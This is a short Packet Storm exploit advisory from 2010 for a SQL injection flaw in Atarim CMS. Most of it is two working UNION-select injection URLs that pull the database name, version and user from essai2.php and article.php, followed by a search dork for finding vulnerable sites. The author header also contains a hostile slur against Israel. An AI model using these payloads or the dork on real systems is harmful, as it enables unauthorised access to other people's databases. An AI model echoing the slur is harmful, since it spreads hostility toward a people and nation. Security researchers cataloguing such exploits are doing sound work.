Atarim CMS SQL Injection

2010-11-11T00:00:00
ID PACKETSTORM:95773
Type packetstorm
Reporter Cru3l.b0y
Modified 2010-11-11T00:00:00

Description

                                        
                                            `In The Name Of GOD  
[+] Exploit Title: Atarim CMS SQL Injection Vulnerability  
[+] Date: 2010-11-11  
[+] Author : Cru3l.b0y  
[+] Software Link: http://www.atarim.co.il/  
[+] Tested on: Ubuntu 10.10  
[+] Contact : Cru3l.b0y@gmail.com  
[+] Website : WwW.PenTesters.IR  
[+] Greeting: Behzad, Ahmad, ...  
[+] Fuck Israeil  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Exploit :   
  
http://target/path/essai2.php?id=-1 union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13  
http://target/path/article.php?id=-1 union select 1,2,3,concat(database(),0x3a,version(),0x3a,user()),5,6,7,8,9,10,11,12,13  
  
[+] Dork: "design by atarim.com"  
`